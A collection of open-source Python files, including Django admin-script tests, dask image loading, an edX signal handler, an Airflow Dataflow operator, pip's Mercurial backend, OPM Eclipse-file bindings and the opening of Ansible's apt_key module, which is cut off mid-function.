def test_template_dir_with_trailing_slash(self):
"Ticket 17475: Template dir passed has a trailing path separator"
template_path = os.path.join(custom_templates_dir, 'project_template' + os.sep)
args = ['startproject', '--template', template_path, 'customtestproject']
testproject_dir = os.path.join(test_dir, 'customtestproject')
self.addCleanup(shutil.rmtree, testproject_dir, True)
out, err = self.run_django_admin(args)
self.assertNoOutput(err)
self.assertTrue(os.path.isdir(testproject_dir))
self.assertTrue(os.path.exists(os.path.join(testproject_dir, 'additional_dir')))
def test_custom_project_template_from_tarball_by_path(self):
"Make sure the startproject management command is able to use a different project template from a tarball"
template_path = os.path.join(custom_templates_dir, 'project_template.tgz')
args = ['startproject', '--template', template_path, 'tarballtestproject']
testproject_dir = os.path.join(test_dir, 'tarballtestproject')
self.addCleanup(shutil.rmtree, testproject_dir, True)
out, err = self.run_django_admin(args)
self.assertNoOutput(err)
self.assertTrue(os.path.isdir(testproject_dir))
self.assertTrue(os.path.exists(os.path.join(testproject_dir, 'run.py')))
def test_custom_project_template_from_tarball_to_alternative_location(self):
"Startproject can use a project template from a tarball and create it in a specified location"
template_path = os.path.join(custom_templates_dir, 'project_template.tgz')
args = ['startproject', '--template', template_path, 'tarballtestproject', 'altlocation']
testproject_dir = os.path.join(test_dir, 'altlocation')
os.mkdir(testproject_dir)
self.addCleanup(shutil.rmtree, testproject_dir)
out, err = self.run_django_admin(args)
self.assertNoOutput(err)
self.assertTrue(os.path.isdir(testproject_dir))
self.assertTrue(os.path.exists(os.path.join(testproject_dir, 'run.py')))
def test_custom_project_template_from_tarball_by_url(self):
"Make sure the startproject management command is able to use a different project template from a tarball via a url"
template_url = '%s/custom_templates/project_template.tgz' % self.live_server_url
args = ['startproject', '--template', template_url, 'urltestproject']
testproject_dir = os.path.join(test_dir, 'urltestproject')
self.addCleanup(shutil.rmtree, testproject_dir, True)
out, err = self.run_django_admin(args)
self.assertNoOutput(err)
self.assertTrue(os.path.isdir(testproject_dir))
self.assertTrue(os.path.exists(os.path.join(testproject_dir, 'run.py')))
def test_project_template_tarball_url(self):
"Startproject management command handles project template tar/zip balls from non-canonical urls"
template_url = '%s/custom_templates/project_template.tgz/' % self.live_server_url
args = ['startproject', '--template', template_url, 'urltestproject']
testproject_dir = os.path.join(test_dir, 'urltestproject')
self.addCleanup(shutil.rmtree, testproject_dir, True)
out, err = self.run_django_admin(args)
self.assertNoOutput(err)
self.assertTrue(os.path.isdir(testproject_dir))
self.assertTrue(os.path.exists(os.path.join(testproject_dir, 'run.py')))
def test_file_without_extension(self):
"Make sure the startproject management command is able to render custom files"
template_path = os.path.join(custom_templates_dir, 'project_template')
args = ['startproject', '--template', template_path, 'customtestproject', '-e', 'txt', '-n', 'Procfile']
testproject_dir = os.path.join(test_dir, 'customtestproject')
self.addCleanup(shutil.rmtree, testproject_dir, True)
out, err = self.run_django_admin(args)
self.assertNoOutput(err)
self.assertTrue(os.path.isdir(testproject_dir))
self.assertTrue(os.path.exists(os.path.join(testproject_dir, 'additional_dir')))
base_path = os.path.join(testproject_dir, 'additional_dir')
for f in ('Procfile', 'additional_file.py', 'requirements.txt'):
self.assertTrue(os.path.exists(os.path.join(base_path, f)))
with open(os.path.join(base_path, f)) as fh:
self.assertEqual(fh.read().strip(),
'# some file for customtestproject test project')
def test_custom_project_template_context_variables(self):
"Make sure template context variables are rendered with proper values"
template_path = os.path.join(custom_templates_dir, 'project_template')
args = ['startproject', '--template', template_path, 'another_project', 'project_dir']
testproject_dir = os.path.join(test_dir, 'project_dir')
os.mkdir(testproject_dir)
self.addCleanup(shutil.rmtree, testproject_dir)
out, err = self.run_django_admin(args)
self.assertNoOutput(err)
test_manage_py = os.path.join(testproject_dir, 'manage.py')
with open(test_manage_py, 'r') as fp:
content = force_text(fp.read())
self.assertIn("project_name = 'another_project'", content)
self.assertIn("project_directory = '%s'" % testproject_dir, content)
def test_no_escaping_of_project_variables(self):
"Make sure template context variables are not html escaped"
# We're using a custom command so we need the alternate settings
self.write_settings('alternate_settings.py')
self.addCleanup(self.remove_settings, 'alternate_settings.py')
template_path = os.path.join(custom_templates_dir, 'project_template')
args = ['custom_startproject', '--template', template_path, 'another_project', 'project_dir', '--extra', '<&>', '--settings=alternate_settings']
testproject_dir = os.path.join(test_dir, 'project_dir')
os.mkdir(testproject_dir)
self.addCleanup(shutil.rmtree, testproject_dir)
out, err = self.run_manage(args)
self.assertNoOutput(err)
test_manage_py = os.path.join(testproject_dir, 'additional_dir', 'extra.py')
with open(test_manage_py, 'r') as fp:
content = fp.read()
self.assertIn("<&>", content)
def test_custom_project_destination_missing(self):
"""
Make sure an exception is raised when the provided
destination directory doesn't exist
"""
template_path = os.path.join(custom_templates_dir, 'project_template')
args = ['startproject', '--template', template_path, 'yet_another_project', 'project_dir2']
testproject_dir = os.path.join(test_dir, 'project_dir2')
out, err = self.run_django_admin(args)
self.assertNoOutput(out)
self.assertOutput(err, "Destination directory '%s' does not exist, please create it first." % testproject_dir)
self.assertFalse(os.path.exists(testproject_dir))
def test_custom_project_template_with_non_ascii_templates(self):
"Ticket 18091: Make sure the startproject management command is able to render templates with non-ASCII content"
template_path = os.path.join(custom_templates_dir, 'project_template')
args = ['startproject', '--template', template_path, '--extension=txt', 'customtestproject']
testproject_dir = os.path.join(test_dir, 'customtestproject')
self.addCleanup(shutil.rmtree, testproject_dir, True)
out, err = self.run_django_admin(args)
self.assertNoOutput(err)
self.assertTrue(os.path.isdir(testproject_dir))
path = os.path.join(testproject_dir, 'ticket-18091-non-ascii-template.txt')
with codecs.open(path, 'r', encoding='utf-8') as f:
self.assertEqual(f.read().splitlines(False), [
'Some non-ASCII text for testing ticket #18091:',
'üäö €'])
class DiffSettings(AdminScriptTestCase):
"""Tests for diffsettings management command."""
def test_basic(self):
"""Runs without error and emits settings diff."""
self.write_settings('settings_to_diff.py', sdict={'FOO': '"bar"'})
self.addCleanup(self.remove_settings, 'settings_to_diff.py')
args = ['diffsettings', '--settings=settings_to_diff']
out, err = self.run_manage(args)
self.assertNoOutput(err)
self.assertOutput(out, "FOO = 'bar' ###")
def test_all(self):
"""The all option also shows settings with the default value."""
self.write_settings('settings_to_diff.py', sdict={'STATIC_URL': 'None'})
self.addCleanup(self.remove_settings, 'settings_to_diff.py')
args = ['diffsettings', '--settings=settings_to_diff', '--all']
out, err = self.run_manage(args)
self.assertNoOutput(err)
self.assertOutput(out, "### STATIC_URL = None")
class Dumpdata(AdminScriptTestCase):
"""Tests for dumpdata management command."""
def setUp(self):
self.write_settings('settings.py')
def tearDown(self):
self.remove_settings('settings.py')
def test_pks_parsing(self):
"""Regression for #20509
Test would raise an exception rather than printing an error message.
"""
args = ['dumpdata', '--pks=1']
out, err = self.run_manage(args)
self.assertOutput(err, "You can only use --pks option with one model")
self.assertNoOutput(out)
| bsd-3-clause |
jeffery-do/Vizdoombot | doom/lib/python3.5/site-packages/dask/array/image.py | 6 | 1997 | from __future__ import absolute_import, division, print_function
from glob import glob
import os
try:
from skimage.io import imread as sk_imread
except ImportError:
pass
from .core import Array
from ..base import tokenize
def add_leading_dimension(x):
return x[None, ...]
def imread(filename, imread=None, preprocess=None):
""" Read a stack of images into a dask array
Parameters
----------
filename: string
A globstring like 'myfile.*.png'
imread: function (optional)
Optionally provide custom imread function.
Function should expect a filename and produce a numpy array.
Defaults to ``skimage.io.imread``.
preprocess: function (optional)
Optionally provide custom function to preprocess the image.
Function should expect a numpy array for a single image.
Examples
--------
>>> from dask.array.image import imread
>>> im = imread('2015-*-*.png') # doctest: +SKIP
>>> im.shape # doctest: +SKIP
(365, 1000, 1000, 3)
Returns
-------
Dask array of all images stacked along the first dimension. All images
will be treated as individual chunks
"""
imread = imread or sk_imread
filenames = sorted(glob(filename))
if not filenames:
raise ValueError("No files found under name %s" % filename)
name = 'imread-%s' % tokenize(filenames, map(os.path.getmtime, filenames))
sample = imread(filenames[0])
if preprocess:
sample = preprocess(sample)
keys = [(name, i) + (0,) * len(sample.shape) for i in range(len(filenames))]
if preprocess:
values = [(add_leading_dimension, (preprocess, (imread, fn)))
for fn in filenames]
else:
values = [(add_leading_dimension, (imread, fn))
for fn in filenames]
dsk = dict(zip(keys, values))
chunks = ((1, ) * len(filenames), ) + tuple((d, ) for d in sample.shape)
return Array(dsk, name, chunks, sample.dtype)
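# A minimal usage sketch (hypothetical file pattern; requires scikit-image
# unless a custom ``imread`` function is supplied):
#
# stack = imread('frames/frame.*.png', preprocess=lambda im: im / 255.0)
# first_frame = stack[0].compute() # each file is one chunk along axis 0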
| mit |
miptliot/edx-platform | common/djangoapps/course_modes/signals.py | 24 | 1561 | """
Signal handler for setting default course mode expiration dates
"""
from django.core.exceptions import ObjectDoesNotExist
from django.dispatch.dispatcher import receiver
from xmodule.modulestore.django import SignalHandler, modulestore
from .models import CourseMode, CourseModeExpirationConfig
@receiver(SignalHandler.course_published)
def _listen_for_course_publish(sender, course_key, **kwargs): # pylint: disable=unused-argument
"""
Catches the signal that a course has been published in Studio and
sets the verified mode dates to defaults.
"""
try:
verified_mode = CourseMode.objects.get(course_id=course_key, mode_slug=CourseMode.VERIFIED)
if _should_update_date(verified_mode):
course = modulestore().get_course(course_key)
if not course:
return None
verification_window = CourseModeExpirationConfig.current().verification_window
new_expiration_datetime = course.end - verification_window
if verified_mode.expiration_datetime != new_expiration_datetime:
# Set the expiration_datetime without triggering the explicit flag
verified_mode._expiration_datetime = new_expiration_datetime # pylint: disable=protected-access
verified_mode.save()
except ObjectDoesNotExist:
pass
def _should_update_date(verified_mode):
""" Returns whether or not the verified mode should be updated. """
return not(verified_mode is None or verified_mode.expiration_datetime_is_explicit)
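# Illustrative arithmetic for the handler above (hypothetical dates):
# with a course ending 2017-06-30 and a 10-day verification window,
# the new expiration is 2017-06-20:
#
# from datetime import datetime, timedelta
# datetime(2017, 6, 30) - timedelta(days=10) # -> datetime(2017, 6, 20)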
| agpl-3.0 |
vquinones/admindemo | myadmin/views.py | 2 | 1463 | from django.contrib.auth.decorators import login_required
from django.utils.decorators import method_decorator
from django.views.generic.base import TemplateView
#from django.contrib.admin.views.decorators import staff_member_required
from django.conf.urls import patterns
from django.contrib import admin
class ScreenConfigurationView(TemplateView):
template_name = 'admin/content/screen.configuration.html'
def get_context_data(self, *args, **kwargs):
context = super(ScreenConfigurationView, self).get_context_data(**kwargs)
return context
@method_decorator(login_required)
def dispatch(self, *args, **kwargs):
return super(ScreenConfigurationView, self).dispatch(*args, **kwargs)
class DisplayConfigurationView(TemplateView):
template_name = 'admin/content/display.configuration.html'
def get_context_data(self, *args, **kwargs):
context = super(DisplayConfigurationView, self).get_context_data(**kwargs)
return context
@method_decorator(login_required)
def dispatch(self, *args, **kwargs):
return super(DisplayConfigurationView, self).dispatch(*args, **kwargs)
def get_admin_urls(urls):
def get_urls():
my_urls = patterns('',
(r'^my_view/$', admin.site.admin_view(ScreenConfigurationView.as_view()))
)
return my_urls + urls
return get_urls
admin_urls = get_admin_urls(admin.site.get_urls())
admin.site.get_urls = admin_urls | gpl-2.0 |
mtdewulf/incubator-airflow | airflow/contrib/operators/dataflow_operator.py | 14 | 3784 | # -*- coding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import copy
from airflow.contrib.hooks.gcp_dataflow_hook import DataFlowHook
from airflow.models import BaseOperator
from airflow.utils.decorators import apply_defaults
class DataFlowJavaOperator(BaseOperator):
"""
Start a Java Cloud DataFlow batch job. The parameters of the operation
will be passed to the job.
It's good practice to define dataflow_* parameters, such as the project,
zone and staging location, in the dag's default_args.
```
default_args = {
'dataflow_default_options': {
'project': 'my-gcp-project',
'zone': 'europe-west1-d',
'stagingLocation': 'gs://my-staging-bucket/staging/'
}
}
```
You need to pass the path to your dataflow as a file reference with the ``jar``
parameter, the jar needs to be a self executing jar. Use ``options`` to pass on
options to your job.
```
t1 = DataFlowJavaOperator(
task_id='dataflow_example',
jar='{{var.value.gcp_dataflow_base}}pipeline/build/libs/pipeline-example-1.0.jar',
options={
'autoscalingAlgorithm': 'BASIC',
'maxNumWorkers': '50',
'start': '{{ds}}',
'partitionType': 'DAY'
},
dag=my-dag)
```
Both ``jar`` and ``options`` are templated so you can use variables in them.
"""
template_fields = ['options', 'jar']
ui_color = '#0273d4'
@apply_defaults
def __init__(
self,
jar,
dataflow_default_options=None,
options=None,
gcp_conn_id='google_cloud_default',
delegate_to=None,
*args,
**kwargs):
"""
Create a new DataFlowJavaOperator.
For more detail on about job submission have a look at the reference:
https://cloud.google.com/dataflow/pipelines/specifying-exec-params
:param jar: The reference to a self executing DataFlow jar.
:type jar: string
:param dataflow_default_options: Map of default job options.
:type dataflow_default_options: dict
:param options: Map of job specific options.
:type options: dict
:param gcp_conn_id: The connection ID to use connecting to Google Cloud Platform.
:type gcp_conn_id: string
:param delegate_to: The account to impersonate, if any.
For this to work, the service account making the request must have domain-wide
delegation enabled.
:type delegate_to: string
"""
super(DataFlowJavaOperator, self).__init__(*args, **kwargs)
dataflow_default_options = dataflow_default_options or {}
options = options or {}
self.gcp_conn_id = gcp_conn_id
self.delegate_to = delegate_to
self.jar = jar
self.dataflow_default_options = dataflow_default_options
self.options = options
def execute(self, context):
hook = DataFlowHook(gcp_conn_id=self.gcp_conn_id, delegate_to=self.delegate_to)
dataflow_options = copy.copy(self.dataflow_default_options)
dataflow_options.update(self.options)
hook.start_java_dataflow(self.task_id, dataflow_options, self.jar)
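# Illustration of the option precedence implemented in execute() above
# (hypothetical values): task-level options override the defaults.
#
# defaults = {'project': 'my-gcp-project', 'zone': 'europe-west1-d'}
# task_options = {'zone': 'us-central1-f', 'maxNumWorkers': '50'}
# merged = copy.copy(defaults)
# merged.update(task_options)
# # merged == {'project': 'my-gcp-project', 'zone': 'us-central1-f',
# # 'maxNumWorkers': '50'}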
| apache-2.0 |
cjaffar/jaffarchiosa | jaffarchiosa/lib/python2.7/site-packages/pip/vcs/mercurial.py | 392 | 5820 | import os
import tempfile
import re
import sys
from pip.util import call_subprocess
from pip.util import display_path, rmtree
from pip.log import logger
from pip.vcs import vcs, VersionControl
from pip.download import path_to_url
from pip.backwardcompat import ConfigParser
class Mercurial(VersionControl):
name = 'hg'
dirname = '.hg'
repo_name = 'clone'
schemes = ('hg', 'hg+http', 'hg+https', 'hg+ssh', 'hg+static-http')
bundle_file = 'hg-clone.txt'
guide = ('# This was a Mercurial repo; to make it a repo again run:\n'
'hg init\nhg pull %(url)s\nhg update -r %(rev)s\n')
def parse_vcs_bundle_file(self, content):
url = rev = None
for line in content.splitlines():
if not line.strip() or line.strip().startswith('#'):
continue
url_match = re.search(r'hg\s*pull\s*(.*)\s*', line)
if url_match:
url = url_match.group(1).strip()
rev_match = re.search(r'^hg\s*update\s*-r\s*(.*)\s*', line)
if rev_match:
rev = rev_match.group(1).strip()
if url and rev:
return url, rev
return None, None
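# For reference, a bundle file written from ``guide`` looks like this
# (hypothetical url and revision); parse_vcs_bundle_file turns it back
# into ('https://example.com/repo', 'abc123'):
#
# # This was a Mercurial repo; to make it a repo again run:
# hg init
# hg pull https://example.com/repo
# hg update -r abc123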
def export(self, location):
"""Export the Hg repository at the url to the destination location"""
temp_dir = tempfile.mkdtemp('-export', 'pip-')
self.unpack(temp_dir)
try:
call_subprocess(
[self.cmd, 'archive', location],
filter_stdout=self._filter, show_stdout=False, cwd=temp_dir)
finally:
rmtree(temp_dir)
def switch(self, dest, url, rev_options):
repo_config = os.path.join(dest, self.dirname, 'hgrc')
config = ConfigParser.SafeConfigParser()
try:
config.read(repo_config)
config.set('paths', 'default', url)
config_file = open(repo_config, 'w')
config.write(config_file)
config_file.close()
except (OSError, ConfigParser.NoSectionError):
e = sys.exc_info()[1]
logger.warn(
'Could not switch Mercurial repository to %s: %s'
% (url, e))
else:
call_subprocess([self.cmd, 'update', '-q'] + rev_options, cwd=dest)
def update(self, dest, rev_options):
call_subprocess([self.cmd, 'pull', '-q'], cwd=dest)
call_subprocess(
[self.cmd, 'update', '-q'] + rev_options, cwd=dest)
def obtain(self, dest):
url, rev = self.get_url_rev()
if rev:
rev_options = [rev]
rev_display = ' (to revision %s)' % rev
else:
rev_options = []
rev_display = ''
if self.check_destination(dest, url, rev_options, rev_display):
logger.notify('Cloning hg %s%s to %s'
% (url, rev_display, display_path(dest)))
call_subprocess([self.cmd, 'clone', '--noupdate', '-q', url, dest])
call_subprocess([self.cmd, 'update', '-q'] + rev_options, cwd=dest)
def get_url(self, location):
url = call_subprocess(
[self.cmd, 'showconfig', 'paths.default'],
show_stdout=False, cwd=location).strip()
if self._is_local_repository(url):
url = path_to_url(url)
return url.strip()
def get_tag_revs(self, location):
tags = call_subprocess(
[self.cmd, 'tags'], show_stdout=False, cwd=location)
tag_revs = []
for line in tags.splitlines():
tags_match = re.search(r'([\w\d\.-]+)\s*([\d]+):.*$', line)
if tags_match:
tag = tags_match.group(1)
rev = tags_match.group(2)
if "tip" != tag:
tag_revs.append((rev.strip(), tag.strip()))
return dict(tag_revs)
def get_branch_revs(self, location):
branches = call_subprocess(
[self.cmd, 'branches'], show_stdout=False, cwd=location)
branch_revs = []
for line in branches.splitlines():
branches_match = re.search(r'([\w\d\.-]+)\s*([\d]+):.*$', line)
if branches_match:
branch = branches_match.group(1)
rev = branches_match.group(2)
if "default" != branch:
branch_revs.append((rev.strip(), branch.strip()))
return dict(branch_revs)
def get_revision(self, location):
current_revision = call_subprocess(
[self.cmd, 'parents', '--template={rev}'],
show_stdout=False, cwd=location).strip()
return current_revision
def get_revision_hash(self, location):
current_rev_hash = call_subprocess(
[self.cmd, 'parents', '--template={node}'],
show_stdout=False, cwd=location).strip()
return current_rev_hash
def get_src_requirement(self, dist, location, find_tags):
repo = self.get_url(location)
if not repo.lower().startswith('hg:'):
repo = 'hg+' + repo
egg_project_name = dist.egg_name().split('-', 1)[0]
if not repo:
return None
current_rev = self.get_revision(location)
current_rev_hash = self.get_revision_hash(location)
tag_revs = self.get_tag_revs(location)
branch_revs = self.get_branch_revs(location)
if current_rev in tag_revs:
# It's a tag
full_egg_name = '%s-%s' % (egg_project_name, tag_revs[current_rev])
elif current_rev in branch_revs:
# It's the tip of a branch
full_egg_name = '%s-%s' % (egg_project_name, branch_revs[current_rev])
else:
full_egg_name = '%s-dev' % egg_project_name
return '%s@%s#egg=%s' % (repo, current_rev_hash, full_egg_name)
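# For illustration (hypothetical repo and hash), the resulting pin looks
# like: 'hg+https://example.com/repo@0f3a9b1c2d4e#egg=pkgname-dev'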
vcs.register(Mercurial)
| mit |
totto82/opm-common | python/opm/io/ecl/__init__.py | 7 | 7470 | from opm._common import eclArrType
from opm._common import EclFile
from opm._common import ERst
from opm._common import ESmry
from opm._common import EGrid
from opm._common import ERft
from opm._common import EclOutput
import sys
import datetime
import numpy as np
# When extracting the strings from CHAR keywords we get a character array, in
# Python this becomes a list of bytes. This desperate monkey-patching is to
# ensure the EclFile class returns normal Python strings in the case of CHAR
# arrays. The return value is normal Python list of strings.
@property
def eclfile_get_list_of_arrays(self):
if sys.version_info.major == 2:
rawData = self.__get_list_of_arrays()
return [ ( x[0].encode("utf-8"), x[1], x[2] ) for x in rawData ]
else:
return self.__get_list_of_arrays()
def getitem_eclfile(self, arg):
if isinstance(arg, tuple):
data, array_type = self.__get_data(str(arg[0]), int(arg[1]))
else:
data, array_type = self.__get_data(arg)
if array_type == eclArrType.CHAR or array_type == eclArrType.C0nn:
return [ x.decode("utf-8") for x in data ]
return data
def erst_get_list_of_arrays(self, arg):
if sys.version_info.major==2:
rawData = self.__get_list_of_arrays(arg)
return [ ( x[0].encode("utf-8"), x[1], x[2] ) for x in rawData ]
else:
return self.__get_list_of_arrays(arg)
def getitem_erst(self, arg):
if not isinstance(arg, tuple):
raise ValueError("expecting tuple argument, (index, rstep), (name, rstep) or (name, rstep, occurrence) ")
if len(arg) == 2:
if isinstance(arg[0], int):
data, array_type = self.__get_data(arg[0], int(arg[1]))
else:
data, array_type = self.__get_data(str(arg[0]), int(arg[1]), 0) # default first occurrence
elif len(arg) == 3:
data, array_type = self.__get_data(str(arg[0]), int(arg[1]), int(arg[2]))
else:
raise ValueError("expecting tuple argument with 2 or 3 argumens: (index, rstep), (name, rstep) or (name, rstep, occurrence) ")
if array_type == eclArrType.CHAR or array_type == eclArrType.C0nn:
return [ x.decode("utf-8") for x in data ]
return data
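# Usage sketch for the patched __getitem__ (hypothetical restart file):
#
# rst = ERst('CASE.UNRST')
# pressure = rst['PRESSURE', 10] # (name, report step), first occurrence
# swat = rst['SWAT', 10, 1] # (name, report step, occurrence)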
def contains_erst(self, arg):
if isinstance(arg, tuple):
if len(arg) == 2:
return self.__contains((arg[0], arg[1]))
else:
raise ValueError("expecting tuple (array name , report step number) or \
or report step number")
elif isinstance(arg, int):
return self.__has_report_step(arg)
else:
raise ValueError("expecting tuple (array name , report step number) or \
or report step number")
@property
def esmry_end_date(self):
start = self.start_date
time = self.__get_all("TIME")
return start + datetime.timedelta(days = float(time[-1]))
def getitem_esmry(self, arg):
if isinstance(arg, tuple):
if arg[1] == True:
return self.__get_at_rstep(arg[0])
else:
return self.__get_all(arg[0])
else:
return self.__get_all(arg)
def contains_erft(self, arg):
if isinstance(arg, tuple):
if len(arg) == 4:
return self.__has_rft(arg[0], arg[1], arg[2], arg[3])
elif len(arg) == 5:
return self.__has_array(arg[0], arg[1], (arg[2], arg[3], arg[4]))
elif len(arg) == 2:
return self.__has_array(arg[0], arg[1])
else:
raise ValueError("expecting tuple (wellname, year, month, day) or \
(arrayName, wellname, year, month, day) or (arrayName, report_index)")
else:
raise ValueError("expecting tuple (wellname, year, month, day) or \
(arrayName, wellname, year, month, day) or (arrayName, report_index)")
@property
def erft_list_of_rfts(self):
if sys.version_info.major==2:
data = self.__get_list_of_rfts()
return [ ( x[0].encode("utf-8"), x[1], x[2] ) for x in data ]
else:
return self.__get_list_of_rfts()
def erft_list_of_arrays(self, arg1, arg2 = None):
if not arg2:
data = self.__get_list_of_arrays(int(arg1))
else:
data = self.__get_list_of_arrays(str(arg1), int(arg2[0]), int(arg2[1]), int(arg2[2]))
if sys.version_info.major==2:
return [ ( x[0].encode("utf-8"), x[1], x[2] ) for x in data ]
else:
return data
def getitem_erft(self, arg):
if isinstance(arg, tuple):
if len(arg) == 2:
data, array_type = self.__get_data(arg[0], arg[1])
elif len(arg) == 5:
data, array_type = self.__get_data(arg[0], arg[1], arg[2], arg[3], arg[4])
else:
raise ValueError("ERft.__getitem__, expecting tuple (name, index) or (name, well, y, m, d)")
else:
raise ValueError("ERft.__getitem__, expecting tuple (name, index) or (name, well, y, m, d)")
if array_type == eclArrType.CHAR:
return np.array([ x.decode("utf-8") for x in data ])
else:
return data
'''
EclOutput supports writing of numpy arrays. Data types
(CHAR, LOGI, REAL, DOUB and INTE) are derived from the numpy dtype property.
EclOutput partly supports writing of python lists
(CHAR, LOGI, INTE)
'''
def ecloutput_write(self, name, array, C0nn=False):
if isinstance(array, list):
if all(isinstance(element, str) for element in array):
array = np.array(array)
elif all(isinstance(element, bool) for element in array):
array = np.array(array)
elif all(isinstance(element, int) for element in array):
array = np.array(array, dtype = "int32")
elif sys.version_info.major == 2 and all(isinstance(element, unicode) for element in array):
array = np.array(array)
else:
raise ValueError("!!array {} is python list, type {}, not supported".format(name, type(array[0])))
if not isinstance(array, np.ndarray):
raise ValueError("EclOutput - write function works only for numpy arrays")
if array.dtype == "float32":
self.__write_real_array(name, array)
elif array.dtype == "int32":
self.__write_inte_array(name, array)
elif array.dtype == "int64":
print ("!Warning, writing numpy dtype=int64 to 32 bit integer format")
self.__write_inte_array(name, array)
elif array.dtype == "float64":
self.__write_doub_array(name, array)
elif array.dtype == "bool":
self.__write_logi_array(name, array)
elif array.dtype.kind in {'U', 'S'} and not C0nn:
self.__write_char_array(name, array)
elif array.dtype.kind in {'U', 'S'} and C0nn:
maxStrLength = max([len(x) for x in array])
self.__write_c0nn_array(name, array, max([maxStrLength, 8]))
else:
raise ValueError("unknown array type for array {}".format(name))
setattr(EclFile, "__getitem__", getitem_eclfile)
setattr(EclFile, "arrays", eclfile_get_list_of_arrays)
setattr(ERst, "__contains__", contains_erst)
setattr(ERst, "arrays", erst_get_list_of_arrays)
setattr(ERst, "__getitem__", getitem_erst)
setattr(ESmry, "end_date", esmry_end_date)
setattr(ESmry, "__getitem__", getitem_esmry)
setattr(ERft, "__contains__", contains_erft)
setattr(ERft, "list_of_rfts", erft_list_of_rfts)
setattr(ERft, "arrays", erft_list_of_arrays)
setattr(ERft, "__getitem__",getitem_erft)
setattr(EclOutput, "write", ecloutput_write)
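# Minimal usage sketch of the patched writer (hypothetical file name):
#
# out = EclOutput('TEST.INIT')
# out.write('PORO', np.array([0.1, 0.2], dtype='float32')) # -> REAL
# out.write('ACTNUM', np.array([1, 0], dtype='int32')) # -> INTE
# out.write('WELLS', ['OP_1', 'OP_2']) # list of str -> CHAR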
| gpl-3.0 |
stansonhealth/ansible-modules-core | packaging/os/apt_key.py | 14 | 10248 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2012, Michael DeHaan <michael.dehaan@gmail.com>
# (c) 2012, Jayson Vantuyl <jayson@aggressive.ly>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
DOCUMENTATION = '''
---
module: apt_key
author: "Jayson Vantuyl & others (@jvantuyl)"
version_added: "1.0"
short_description: Add or remove an apt key
description:
- Add or remove an I(apt) key, optionally downloading it
notes:
- doesn't download the key unless it really needs it
- as a sanity check, downloaded key id must match the one specified
- best practice is to specify the key id and the url
options:
id:
required: false
default: none
description:
- identifier of key. Including this allows check mode to correctly report the changed state.
data:
required: false
default: none
description:
- keyfile contents
file:
required: false
default: none
description:
- keyfile path
keyring:
required: false
default: none
description:
- path to specific keyring file in /etc/apt/trusted.gpg.d
version_added: "1.3"
url:
required: false
default: none
description:
- url to retrieve key from.
keyserver:
version_added: "1.6"
required: false
default: none
description:
- keyserver to retrieve key from.
state:
required: false
choices: [ absent, present ]
default: present
description:
- used to specify if key is being added or revoked
validate_certs:
description:
- If C(no), SSL certificates for the target url will not be validated. This should only be used
on personally controlled sites using self-signed certificates.
required: false
default: 'yes'
choices: ['yes', 'no']
'''
EXAMPLES = '''
# Add an apt key by id from a keyserver
- apt_key: keyserver=keyserver.ubuntu.com id=36A1D7869245C8950F966E92D8576A8BA88D21E9
# Add an Apt signing key, uses whichever key is at the URL
- apt_key: url=https://ftp-master.debian.org/keys/archive-key-6.0.asc state=present
# Add an Apt signing key, will not download if present
- apt_key: id=473041FA url=https://ftp-master.debian.org/keys/archive-key-6.0.asc state=present
# Remove an Apt signing key, uses whichever key is at the URL
- apt_key: url=https://ftp-master.debian.org/keys/archive-key-6.0.asc state=absent
# Remove an Apt-specific signing key; a leading 0x is valid
- apt_key: id=0x473041FA state=absent
# Add a key from a file on the Ansible server
- apt_key: data="{{ lookup('file', 'apt.gpg') }}" state=present
# Add an Apt signing key to a specific keyring file
- apt_key: id=473041FA url=https://ftp-master.debian.org/keys/archive-key-6.0.asc keyring=/etc/apt/trusted.gpg.d/debian.gpg state=present
'''
# FIXME: standardize into module_common
from traceback import format_exc
from re import compile as re_compile
# FIXME: standardize into module_common
from distutils.spawn import find_executable
from os import environ
from sys import exc_info
import traceback
match_key = re_compile("^gpg:.*key ([0-9a-fA-F]+):.*$")
REQUIRED_EXECUTABLES=['gpg', 'grep', 'apt-key']
def check_missing_binaries(module):
missing = [e for e in REQUIRED_EXECUTABLES if not find_executable(e)]
if len(missing):
module.fail_json(msg="binaries are missing", names=missing)
def all_keys(module, keyring, short_format):
if keyring:
cmd = "apt-key --keyring %s adv --list-public-keys --keyid-format=long" % keyring
else:
cmd = "apt-key adv --list-public-keys --keyid-format=long"
(rc, out, err) = module.run_command(cmd)
results = []
lines = to_native(out).split('\n')
for line in lines:
if line.startswith("pub") or line.startswith("sub"):
tokens = line.split()
code = tokens[1]
(len_type, real_code) = code.split("/")
results.append(real_code)
if short_format:
results = shorten_key_ids(results)
return results
def shorten_key_ids(key_id_list):
"""
Takes a list of key ids, and converts them to the 'short' format,
by reducing them to their last 8 characters.
"""
short = []
for key in key_id_list:
short.append(key[-8:])
return short
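# e.g. shorten_key_ids(['36A1D7869245C8950F966E92D8576A8BA88D21E9'])
# returns ['A88D21E9']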
def download_key(module, url):
# FIXME: move get_url code to common, allow for in-memory D/L, support proxies
# and reuse here
if url is None:
module.fail_json(msg="needed a URL but was not specified")
try:
rsp, info = fetch_url(module, url)
if info['status'] != 200:
module.fail_json(msg="Failed to download key at %s: %s" % (url, info['msg']))
return rsp.read()
except Exception:
module.fail_json(msg="error getting key id from url: %s" % url, traceback=format_exc())
def import_key(module, keyring, keyserver, key_id):
if keyring:
cmd = "apt-key --keyring %s adv --keyserver %s --recv %s" % (keyring, keyserver, key_id)
else:
cmd = "apt-key adv --keyserver %s --recv %s" % (keyserver, key_id)
for retry in range(5):
(rc, out, err) = module.run_command(cmd)
if rc == 0:
break
else:
# Out of retries
